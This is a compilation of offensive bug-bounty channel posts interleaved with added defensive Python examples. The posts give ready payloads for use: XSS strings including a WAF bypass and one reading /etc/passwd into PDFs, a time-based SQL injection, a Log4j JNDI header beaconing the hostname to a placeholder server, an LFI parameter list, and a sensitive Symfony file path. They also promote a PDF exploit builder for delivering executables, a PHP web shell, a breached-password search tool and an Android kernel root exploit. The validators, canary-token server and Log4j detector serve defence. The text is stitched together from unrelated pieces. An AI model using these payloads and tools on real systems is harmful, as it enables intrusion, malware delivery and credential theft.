XSS in the .css URL path
Original URL:
"target/lib/css/animated.min.css"
XSS found in:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
#BugBounty #Tips
T.me/BugCod3BOT
T.me/BugCod3
This is very cool. Get cheatsheets in your terminal with a curl command!
Try this:
curl https://cht.sh/sqlmap
#Tips
T.me/LearnExploit
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
Requirements:
pip install -r requirements.txt
Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]
#Python #Search #Parse #Password
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).
Put your exe-link and build the PDF-FILE
#C #PDF #Exploit
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.
Features:
+ Command history (↑ ↓ keys)
+ Auto-completion (Tab key)
+ Navigate the remote file system (cd command)
+ Upload a file (upload <destination_file_name> command)
+ Download a file (download <file_name> command)
Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php
#PHP #Shell #Pentesting
If you find Web frameworks like Symfony, add
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'
to the wordlist, and you may get juicy data.
#BugBounty #Tips
Tip for Stored XSS Bypass on Profile Uploader:
+ add magic number (jpg, jpeg)
+ bypass file extension protection
Magic Number
#BugBounty #Tips
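Both tricks above (prepending a JPEG magic number to a payload, and getting past an extension check) defeat validators that only look at the first few bytes or at the file name. The following is an added defender-side example in Python, not code from the post: it walks the whole JPEG marker structure from SOI to EOI, so a file that merely starts with FF D8 FF but is really HTML fails at the first segment length, and a real JPEG with a script appended after the EOI marker is rejected because bytes remain after it. The `.jpg`/`.jpeg` allowlist and the sample byte strings are constructed for the example.

```python
"""Defender-side image upload validator (added example, not the post's code).

Checking only the extension or the leading "magic number" is exactly what the
bypass above relies on, so this walks the full JPEG marker structure instead.
"""
import os

# Assumption: the profile uploader only accepts JPEG; extend as needed.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg"}
JPEG_SOI = b"\xff\xd8"


def validate_jpeg_structure(data: bytes) -> tuple[bool, str]:
    """Walk JPEG marker segments from SOI to EOI. Returns (ok, reason)."""
    n = len(data)
    if n < 4 or data[:2] != JPEG_SOI:
        return False, "missing SOI marker"
    i = 2
    while True:
        if i >= n or data[i] != 0xFF:
            return False, f"expected marker at offset {i}"
        while i < n and data[i] == 0xFF:          # 0xFF fill bytes may precede a marker
            i += 1
        if i >= n:
            return False, "truncated marker"
        marker = data[i]
        i += 1
        if marker == 0xD9:                        # EOI: nothing may follow it
            if i != n:
                return False, f"{n - i} trailing bytes after EOI"
            return True, "ok"
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # TEM / RSTn carry no payload
            continue
        if i + 2 > n:
            return False, "truncated segment length"
        seg_len = int.from_bytes(data[i:i + 2], "big")  # length includes its own 2 bytes
        if seg_len < 2 or i + seg_len > n:
            return False, f"bad segment length {seg_len} for marker 0x{marker:02X}"
        i += seg_len
        if marker == 0xDA:                        # SOS: skip entropy-coded data to the next marker
            while True:
                j = data.find(b"\xff", i)
                if j == -1 or j + 1 >= n:
                    return False, "unterminated scan data"
                nxt = data[j + 1]
                if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:   # stuffed 0xFF or restart marker
                    i = j + 2
                    continue
                i = j
                break


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Extension allowlist first, then a structural check of the bytes."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    return validate_jpeg_structure(data)


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed samples (not real uploads): a minimal JPEG-shaped file, the same
# file with a script appended after EOI, and HTML wearing a JPEG magic number.
GOOD_JPEG = (
    JPEG_SOI
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\xff\x00\x56"                     # scan data containing a stuffed FF 00
    + b"\xff\xd9"
)
POLYGLOT_JPEG = GOOD_JPEG + b"<script>alert(document.domain)</script>"
MAGIC_ONLY = b"\xff\xd8\xff\xe0<script>alert(document.domain)</script>"

if __name__ == "__main__":
    for name, blob in [("avatar.jpg", GOOD_JPEG), ("avatar.jpg", POLYGLOT_JPEG),
                       ("avatar.jpg", MAGIC_ONLY), ("avatar.jpg.php", GOOD_JPEG)]:
        print(name, validate_upload(name, blob))
```

Structural validation is one layer; the upload should also be re-encoded server side and served with a fixed image Content-Type plus `X-Content-Type-Options: nosniff`, so that even a file which passes this check is never interpreted as HTML.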
Canarytokens
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
Site
#Pentesting #BugBounty
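The web-bug mechanism described above, as an added example in Python (this is not Canarytokens' own code): a registry mints an unguessable token URL, the URL is embedded as a 1x1 image, and every GET for it is recorded as an alert while the client just receives a transparent GIF. The base URL, the in-memory registry and the replayed requests are all constructed for the example.

```python
"""Minimal web-bug style canary token service (added example, not Canarytokens' code)."""
import datetime
import secrets
from dataclasses import dataclass, field

# 1x1 transparent GIF returned for every hit so the embed renders harmlessly.
PIXEL_GIF = bytes.fromhex(
    "47494638396101000100800000000000ffffff21f90401000000002c00000000"
    "010001000002024401003b"
)


@dataclass
class Hit:
    token: str
    when: str
    remote_addr: str
    user_agent: str
    referer: str


@dataclass
class CanaryRegistry:
    base_url: str                                 # assumption: where the pixel is served from
    tokens: dict = field(default_factory=dict)    # token -> memo (where it was planted)
    hits: list = field(default_factory=list)

    def mint(self, memo: str) -> str:
        """Create an unguessable token and return the URL to embed."""
        token = secrets.token_urlsafe(16)
        self.tokens[token] = memo
        return f"{self.base_url}/{token}.gif"

    @staticmethod
    def embed_html(url: str) -> str:
        """The web-bug form: a 1x1 image tag pointing at the token URL."""
        return f'<img src="{url}" width="1" height="1" alt="">'

    def handle_get(self, path: str, headers: dict, remote_addr: str):
        """Serve the pixel and record the hit; unknown tokens get a plain 404."""
        token = path.rsplit("/", 1)[-1].removesuffix(".gif")
        if token not in self.tokens:
            return 404, "text/plain", b"not found"
        self.hits.append(Hit(
            token=token,
            when=datetime.datetime.now(datetime.timezone.utc).isoformat(timespec="seconds"),
            remote_addr=remote_addr,
            user_agent=headers.get("User-Agent", ""),
            referer=headers.get("Referer", ""),
        ))
        return 200, "image/gif", PIXEL_GIF

    def alerts(self) -> list:
        """What a defender reviews: which planted memo fired, from where, with what client."""
        return [(self.tokens[h.token], h.remote_addr, h.user_agent, h.when) for h in self.hits]


def demo() -> list:
    """Constructed walk-through: plant a token in a lure document, then replay one
    GET for it and one GET for a token that was never minted."""
    reg = CanaryRegistry("https://canary.example.invalid/t")
    url = reg.mint("finance-share/passwords.docx lure")
    reg.embed_html(url)                           # what you would paste into the lure
    reg.handle_get(url.removeprefix(reg.base_url),
                   {"User-Agent": "Mozilla/5.0 (constructed)"}, "203.0.113.9")
    reg.handle_get("/t/not-a-real-token.gif", {}, "198.51.100.4")
    return reg.alerts()


if __name__ == "__main__":
    for memo, addr, ua, when in demo():
        print(f"[{when}] canary '{memo}' fetched by {addr} ({ua})")
```

The token is the only secret: it must be long and random (here 128 bits from `secrets`) and must never appear anywhere except the planted lure, otherwise a hit cannot be attributed to that lure being opened.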
Translate JavaScript to other writing systems!
Site
ฮYใญIแใณฮ ๐พ
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
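On the defending side, every one of the parameters listed above that ends up in a file include needs the same guard. The following is an added Python example, not from the post: it resolves the user-supplied value strictly under a fixed base directory, undoing repeated percent-encoding and rejecting NUL bytes, URL/stream-wrapper syntax, absolute paths and traversal before a final realpath check. `BASE_DIR`, the suffix allowlist and the sample query strings are constructed for the example.

```python
"""Server-side guard for file-type request parameters (added example, not the post's code)."""
import os
import posixpath
from urllib.parse import parse_qsl, unquote

# Parameter names from the list above that commonly feed a file include.
LFI_PARAMS = ("dir", "action", "date", "detail", "file", "download",
              "path", "folder", "include", "page", "locate", "site")
BASE_DIR = "/var/www/app/pages"          # assumption: the only directory includes may come from
ALLOWED_SUFFIXES = (".php", ".html")      # assumption: what a legitimate include looks like


def resolve_under(base_dir: str, value: str, allowed_suffixes=ALLOWED_SUFFIXES):
    """Return (absolute_path, "ok") or (None, reason)."""
    decoded = value
    for _ in range(3):                    # undo single, double and triple percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        return None, "NUL byte"
    if "://" in decoded:                  # remote URLs and php:// style stream wrappers
        return None, "URL or stream wrapper"
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/") or (len(decoded) > 1 and decoded[1] == ":"):
        return None, "absolute path"
    norm = posixpath.normpath(decoded)
    if norm == ".." or norm.startswith("../"):
        return None, "directory traversal"
    if not norm.endswith(allowed_suffixes):
        return None, "suffix not allowed"
    real_base = os.path.realpath(base_dir)
    real_full = os.path.realpath(os.path.join(real_base, norm))
    # Final authority: the resolved path must still live under the base directory.
    if os.path.commonpath([real_base, real_full]) != real_base:
        return None, "escapes base directory"
    return real_full, "ok"


def check_query(query_string: str, base_dir: str = BASE_DIR) -> dict:
    """Apply resolve_under to every listed parameter present in the query string."""
    results = {}
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name in LFI_PARAMS:
            results[name] = resolve_under(base_dir, value)
    return results


# Constructed query strings: one legitimate include and the kinds of values an
# LFI probe of the parameters above would send.
SAMPLES = [
    "page=about.php",
    "file=../../../../etc/passwd",
    "include=..%252F..%252Fetc%252Fpasswd",   # double-encoded traversal
    "path=/etc/passwd",
    "page=about.php%00.jpg",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(q, "->", check_query(q))
```

The realpath comparison is the check that actually matters; the earlier rejections only give the application a precise reason to log, which is what turns a blocked request into a useful detection signal.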
For 0Day SQLI in
(app extension)
payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
#BugBounty #Tips
XSS to Exfiltrate Data from PDFs
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/hosts");x.send();</script>
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402
┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403
#Notification #NewYear
If you are testing an API, before fuzzing observe these:
1. Does it return the same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
3. How is the naming convention used? user_groups or userGroups, etc. Then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
#BugBounty #Tips
Log4j (application was running Java)
Vulnerable header:
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty #Tips #Security
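The header above shows why naive string matching on `${jndi:` is not enough: Log4j resolves nested lookups and `${name:-default}` default values before acting, so the same detector has to normalise first and look for the lookup prefix afterwards. The following is an added detection example in Python, not from the post; it reuses the post's header value as one sample, and the log format and the other lines are constructed.

```python
"""Detection of Log4Shell-style lookups in request headers (added example)."""
import re

# Innermost lookup: ${...} containing no further $, { or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Constructed log format for the samples below: ... Header-Name="value" ...
HEADER_RE = re.compile(r'([\w-]+)="([^"]*)"')


def normalize_lookups(value: str) -> str:
    """Resolve `${name:-default}` to its default (as Log4j does when the name is
    undefined); keep other lookups textually intact so they stay recognisable."""
    text = value
    while True:
        def resolve(m):
            body = m.group(1)
            if ":-" in body:
                return body.split(":-", 1)[1]
            return "\x00" + body + "\x01"     # park an unresolvable lookup so the loop terminates
        new = INNER_LOOKUP.sub(resolve, text)
        if new == text:
            break
        text = new
    return text.replace("\x00", "${").replace("\x01", "}")


def is_jndi_lookup(value: str) -> bool:
    """Log4j lookup prefixes are case-insensitive, so compare in lower case."""
    return "${jndi:" in normalize_lookups(value).lower()


def scan_log(lines) -> list:
    """Return (line_number, header_name, normalized_value) for every suspicious header."""
    findings = []
    for no, line in enumerate(lines, 1):
        for name, value in HEADER_RE.findall(line):
            if is_jndi_lookup(value):
                findings.append((no, name, normalize_lookups(value)))
    return findings


# Constructed access log lines; line 2 carries the header value from the post.
SAMPLE_LOG = [
    '2024-03-20T10:00:00Z 203.0.113.7 GET /login 200 '
    'X-Forwarded-For="198.51.100.20" User-Agent="Mozilla/5.0 (constructed)"',
    '2024-03-20T10:00:01Z 203.0.113.8 GET /login 200 '
    'X-Forwarded-For="${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}" '
    'User-Agent="curl/8.0 (constructed)"',
    '2024-03-20T10:00:02Z 203.0.113.9 GET /api 200 '
    'X-Forwarded-For="198.51.100.21" User-Agent="${JNDI:ldap://<Server-link>/a}"',
]

if __name__ == "__main__":
    for no, header, normalized in scan_log(SAMPLE_LOG):
        print(f"line {no}: {header} = {normalized}")
```

Run this over the headers your edge logs (X-Forwarded-For, User-Agent, Referer and anything else that reaches a logging statement); the normalised value in the finding is what the application would have tried to resolve, which is the form worth alerting on.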
Easy P1
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2
#BugBounty #Tips
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.
Github
Download
#C #Exploit #Android #Kernel #Pixel